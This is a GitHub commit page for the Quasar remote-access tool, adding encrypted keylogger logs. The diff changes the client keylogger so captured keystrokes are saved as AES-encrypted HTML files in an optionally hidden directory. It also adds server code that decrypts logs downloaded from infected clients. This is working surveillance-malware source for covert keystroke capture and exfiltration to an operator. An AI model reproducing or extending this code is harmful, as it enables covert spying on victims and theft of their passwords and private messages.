Skip to content

Commit

Permalink
Added encrypted Keylogger Logs (quasar#396)
Browse files Browse the repository at this point in the history
  • Loading branch information
@MaxXor
MaxXor committed Sep 18, 2015
1 parent daee83d commit 4b0466d
Show file tree
Hide file tree
Showing 12 changed files with 127 additions and 67 deletions.
4 changes: 2 additions & 2 deletions Client.Tests/Core/Encryption/AES.Tests.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,7 @@ public void EncryptAndDecryptStringTest()
var input = FileHelper.GetRandomFilename(100);
var password = FileHelper.GetRandomFilename(50);

AES.PreHashKey(password);
AES.SetDefaultKey(password);

var encrypted = AES.Encrypt(input);

Expand All @@ -33,7 +33,7 @@ public void EncryptAndDecryptByteArrayTest()
var inputByte = Encoding.UTF8.GetBytes(input);
var password = FileHelper.GetRandomFilename(50);

AES.PreHashKey(password);
AES.SetDefaultKey(password);

var encryptedByte = AES.Encrypt(inputByte);

Expand Down
14 changes: 7 additions & 7 deletions Client/Core/Cryptography/AES.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,13 +9,13 @@ namespace xClient.Core.Cryptography
public static class AES
{
private const int IVLENGTH = 16;
private static byte[] _key;
private static byte[] _defaultKey;

public static void PreHashKey(string key)
public static void SetDefaultKey(string key)
{
using (var md5 = new MD5CryptoServiceProvider())
{
_key = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
_defaultKey = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
}
}

Expand All @@ -31,7 +31,7 @@ public static string Encrypt(string input)

public static byte[] Encrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");

byte[] data = input, encdata = new byte[0];
Expand All @@ -40,7 +40,7 @@ public static byte[] Encrypt(byte[] input)
{
using (var ms = new MemoryStream())
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
aesProvider.GenerateIV();

Expand Down Expand Up @@ -102,7 +102,7 @@ public static string Decrypt(string input)

public static byte[] Decrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");

byte[] data = new byte[0];
Expand All @@ -111,7 +111,7 @@ public static byte[] Decrypt(byte[] input)
{
using (var ms = new MemoryStream(input))
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
byte[] iv = new byte[IVLENGTH];
ms.Read(iv, 0, IVLENGTH); // read first 16 bytes for IV, followed by encrypted message
Expand Down
28 changes: 28 additions & 0 deletions Client/Core/Helper/FileHelper.cs
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,8 @@
using System;
using System.IO;
using System.Text;
using xClient.Config;
using xClient.Core.Cryptography;
using xClient.Core.Data;
using xClient.Core.Utilities;

Expand Down Expand Up @@ -144,5 +146,31 @@ public static bool ClearReadOnly(string filePath)
return false;
}
}

/// <summary>
/// Appends text to a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
/// <param name="appendText">The text to append.</param>
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;

using (FileStream fStream = File.Open(filename, FileMode.Create, FileAccess.Write))
{
byte[] data = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fStream.Seek(0, SeekOrigin.Begin);
fStream.Write(data, 0, data.Length);
}
}

/// <summary>
/// Reads a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
public static string ReadLogFile(string filename)
{
return File.Exists(filename) ? Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename))) : string.Empty;
}
}
}
55 changes: 24 additions & 31 deletions Client/Core/Utilities/Keylogger.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -245,7 +245,7 @@ private void WriteFile()
{
bool writeHeader = false;

string fileName = Path.Combine(LogDirectory, DateTime.Now.ToString("MM-dd-yyyy"));
string filename = Path.Combine(LogDirectory, DateTime.Now.ToString("MM-dd-yyyy"));

try
{
Expand All @@ -254,47 +254,40 @@ private void WriteFile()
if (!di.Exists)
di.Create();

if(Settings.HIDELOGDIRECTORY)
if (Settings.HIDELOGDIRECTORY)
di.Attributes = FileAttributes.Directory | FileAttributes.Hidden;

if (!File.Exists(fileName))
if (!File.Exists(filename))
writeHeader = true;

using (FileStream fileStream = new FileStream(fileName, FileMode.Append, FileAccess.Write))
StringBuilder logFile = new StringBuilder();

if (writeHeader)
{
using (StreamWriter sw = new StreamWriter(fileStream))
{
try
{
if (writeHeader)
{
sw.WriteLine("<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on " +
DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "<br><br>");

// Write out our coloring scheme that will be used by the elements
// generated by the logger, and display paragaphs without line breaks
// h = Denotes highlighted text (blue color).
sw.WriteLine("<style>.h { color: 0000ff; display: inline; }</style>");

if (_logFileBuffer.Length > 0)
sw.Write(_logFileBuffer);

_lastWindowTitle = string.Empty;
}
else
sw.Write(_logFileBuffer);
}
catch
{
}
}
logFile.Append(
"<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on " +
DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "<br><br>");

logFile.Append("<style>.h { color: 0000ff; display: inline; }</style>");

_lastWindowTitle = string.Empty;
}

if (_logFileBuffer.Length > 0)
{

logFile.Append(_logFileBuffer);
}

FileHelper.WriteLogFile(filename, logFile.ToString());

logFile.Clear();
}
catch
{
}

_logFileBuffer = new StringBuilder();
_logFileBuffer.Clear();
}
}
}
2 changes: 1 addition & 1 deletion Client/Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -90,7 +90,7 @@ private static bool Initialize()
if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION)) // no hosts to connect
return false;

AES.PreHashKey(Settings.PASSWORD);
AES.SetDefaultKey(Settings.PASSWORD);
ClientData.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();

Expand Down
4 changes: 2 additions & 2 deletions Server.Tests/Core/Encryption/AES.Tests.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,7 @@ public void EncryptAndDecryptStringTest()
var input = FileHelper.GetRandomFilename(100);
var password = FileHelper.GetRandomFilename(50);

AES.PreHashKey(password);
AES.SetDefaultKey(password);

var encrypted = AES.Encrypt(input);

Expand All @@ -33,7 +33,7 @@ public void EncryptAndDecryptByteArrayTest()
var inputByte = Encoding.UTF8.GetBytes(input);
var password = FileHelper.GetRandomFilename(50);

AES.PreHashKey(password);
AES.SetDefaultKey(password);

var encryptedByte = AES.Encrypt(inputByte);

Expand Down
39 changes: 26 additions & 13 deletions Server/Core/Commands/SurveillanceHandler.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@
using System.Linq;
using System.Threading;
using xServer.Core.Data;
using xServer.Core.Helper;
using xServer.Core.Networking;
using xServer.Core.Packets.ClientPackets;
using xServer.Core.Packets.ServerPackets;
Expand Down Expand Up @@ -130,25 +131,37 @@ public static void HandleGetKeyloggerLogsResponse(Client client, GetKeyloggerLog

destFile.AppendBlock(packet.Block, packet.CurrentBlock);

if (packet.Index == packet.FileCount && (packet.CurrentBlock + 1) == packet.MaxBlocks)
if ((packet.CurrentBlock + 1) == packet.MaxBlocks)
{
FileInfo[] iFiles = new DirectoryInfo(Path.Combine(client.Value.DownloadDirectory, "Logs\\")).GetFiles();

if (iFiles.Length == 0)
return;
try
{
File.WriteAllText(downloadPath, FileHelper.ReadLogFile(downloadPath));
}
catch
{
}

foreach (FileInfo file in iFiles)
if (packet.Index == packet.FileCount)
{
if (client.Value == null || client.Value.FrmKl == null)
break;
FileInfo[] iFiles =
new DirectoryInfo(Path.Combine(client.Value.DownloadDirectory, "Logs\\")).GetFiles();

client.Value.FrmKl.AddLogToListview(file.Name);
}
if (iFiles.Length == 0)
return;

if (client.Value == null || client.Value.FrmKl == null)
return;
foreach (FileInfo file in iFiles)
{
if (client.Value == null || client.Value.FrmKl == null)
break;

client.Value.FrmKl.SetGetLogsEnabled(true);
client.Value.FrmKl.AddLogToListview(file.Name);
}

if (client.Value == null || client.Value.FrmKl == null)
return;

client.Value.FrmKl.SetGetLogsEnabled(true);
}
}
}

Expand Down
14 changes: 7 additions & 7 deletions Server/Core/Cryptography/AES.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,13 +9,13 @@ namespace xServer.Core.Cryptography
public static class AES
{
private const int IVLENGTH = 16;
private static byte[] _key;
private static byte[] _defaultKey;

public static void PreHashKey(string key)
public static void SetDefaultKey(string key)
{
using (var md5 = new MD5CryptoServiceProvider())
{
_key = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
_defaultKey = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
}
}

Expand All @@ -31,7 +31,7 @@ public static string Encrypt(string input)

public static byte[] Encrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");

byte[] data = input, encdata = new byte[0];
Expand All @@ -40,7 +40,7 @@ public static byte[] Encrypt(byte[] input)
{
using (var ms = new MemoryStream())
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
aesProvider.GenerateIV();

Expand Down Expand Up @@ -102,7 +102,7 @@ public static string Decrypt(string input)

public static byte[] Decrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");

byte[] data = new byte[0];
Expand All @@ -111,7 +111,7 @@ public static byte[] Decrypt(byte[] input)
{
using (var ms = new MemoryStream(input))
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
byte[] iv = new byte[IVLENGTH];
ms.Read(iv, 0, IVLENGTH); // read first 16 bytes for IV, followed by encrypted message
Expand Down
27 changes: 27 additions & 0 deletions Server/Core/Helper/FileHelper.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
using System.IO;
using System.Linq;
using System.Text;
using xServer.Core.Cryptography;

namespace xServer.Core.Helper
{
Expand Down Expand Up @@ -102,5 +103,31 @@ public static int GetFileIcon(string extension)
return 10;
}
}

/// <summary>
/// Appends text to a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
/// <param name="appendText">The text to append.</param>
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;

using (FileStream fStream = File.Open(filename, FileMode.Create, FileAccess.Write))
{
byte[] data = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fStream.Seek(0, SeekOrigin.Begin);
fStream.Write(data, 0, data.Length);
}
}

/// <summary>
/// Reads a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
public static string ReadLogFile(string filename)
{
return File.Exists(filename) ? Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename))) : string.Empty;
}
}
}
1 change: 0 additions & 1 deletion Server/Forms/FrmKeylogger.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,6 @@
using System.Windows.Forms;
using xServer.Core.Helper;
using xServer.Core.Networking;
using xServer.Core.Utilities;

namespace xServer.Forms
{
Expand Down
2 changes: 1 addition & 1 deletion Server/Forms/FrmMain.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,7 @@ public FrmMain()
{
Instance = this;

AES.PreHashKey(Settings.Password);
AES.SetDefaultKey(Settings.Password);

#if !DEBUG
if (Settings.ShowToU)
Expand Down
Loading

0 comments on commit 4b0466d

Please sign in to comment.